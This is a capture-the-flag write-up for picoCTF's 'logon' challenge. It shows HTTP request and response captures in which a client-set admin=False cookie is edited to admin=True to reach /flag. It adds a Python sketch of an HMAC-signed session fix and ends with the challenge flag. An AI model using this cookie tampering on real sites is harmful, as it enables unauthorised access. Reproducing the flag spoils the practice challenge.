Description
picoCTF - logon
The factory is hiding things from all of its users. Can you login as Joe and find what they’ve been looking at? https://jupiter.challenges.picoctf.org/problem/44573/ (link) or http://jupiter.challenges.picoctf.org:44573
Hint: Hmm it doesn’t seem to check anyone’s password, except for Joe’s?
Approach
The login request looks like this:
POST /login HTTP/1.1
Host: jupiter.challenges.picoctf.org:44573
Content-Length: 25
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://jupiter.challenges.picoctf.org:44573
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://jupiter.challenges.picoctf.org:44573/
Accept-Encoding: gzip, deflate, br
Accept-Language: vi,en-US;q=0.9,en;q=0.8
DNT: 1
Connection: close

user=admin&password=admin
The response sets 3 cookies:
HTTP/1.1 302 FOUND
Content-Type: text/html; charset=utf-8
Content-Length: 217
Location: http://jupiter.challenges.picoctf.org:44573/flag
Set-Cookie: password=admin; Path=/
Set-Cookie: username=admin; Path=/
Set-Cookie: admin=False; Path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>Redirecting...</title>
<h1>Redirecting...</h1>
<p>You should be redirected automatically to target URL: <a href="/flag">/flag</a>. If not click the link.
The GET request to the /flag endpoint returns no flag. Try changing the cookie admin=False to admin=True and resend the request:
GET /flag HTTP/1.1
Host: jupiter.challenges.picoctf.org:44573
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://jupiter.challenges.picoctf.org:44573
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36 Edg/122.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://jupiter.challenges.picoctf.org:44573/login
Accept-Encoding: gzip, deflate, br
Accept-Language: vi,en-US;q=0.9,en;q=0.8
Cookie: password=admin; username=admin; admin=True
DNT: 1
Connection: close
The flag is in the response.
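Added example, not part of the original write-up or the challenge's own code: the root cause is that the server reads the role from a cookie the client controls. The sketch below puts that check beside a hardened one that only trusts a role protected by a server-side HMAC. All function names, the cookie name "session" and the key are assumptions made for illustration.

```python
import hashlib
import hmac

# Assumption: a server-side secret; a real deployment loads it from configuration.
SECRET_KEY = b"constructed-demo-key-not-for-production"


def is_admin_vulnerable(cookies):
    """The flaw shown above: the role comes straight from a client-set cookie."""
    return cookies.get("admin") == "True"


def _sign(payload):
    """Hex HMAC-SHA256 of the payload under the server-side key."""
    return hmac.new(SECRET_KEY, payload.encode(), hashlib.sha256).hexdigest()


def issue_session(username, admin):
    """Build one cookie value that binds username and role to a MAC."""
    payload = f"{username}|{int(admin)}"
    return f"{payload}|{_sign(payload)}"


def is_admin_hardened(cookies):
    """Accept the role only if the MAC verifies; otherwise treat as non-admin."""
    payload, sep, tag = cookies.get("session", "").rpartition("|")
    if not sep:
        return False
    # Compare as bytes in constant time; a tampered payload changes the MAC.
    if not hmac.compare_digest(tag.encode(), _sign(payload).encode()):
        return False
    _username, sep, role = payload.rpartition("|")
    return bool(sep) and role == "1"


if __name__ == "__main__":
    # Cookie set taken from the modified request in the write-up.
    edited = {"password": "admin", "username": "admin", "admin": "True"}
    print("vulnerable check:", is_admin_vulnerable(edited))

    # Constructed sample: a non-admin session whose role flag is then edited.
    session = issue_session("admin", False)
    forged = session.replace("|0|", "|1|")
    print("hardened, untouched:", is_admin_hardened({"session": session}))
    print("hardened, role edited:", is_admin_hardened({"session": forged}))
```

The response above also stores the submitted password in a cookie; a server-issued session value like this one removes the need to send the password back to the client at all.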
Flag
Success
picoCTF{th3_c0nsp1r4cy_l1v3s_0c98aacc}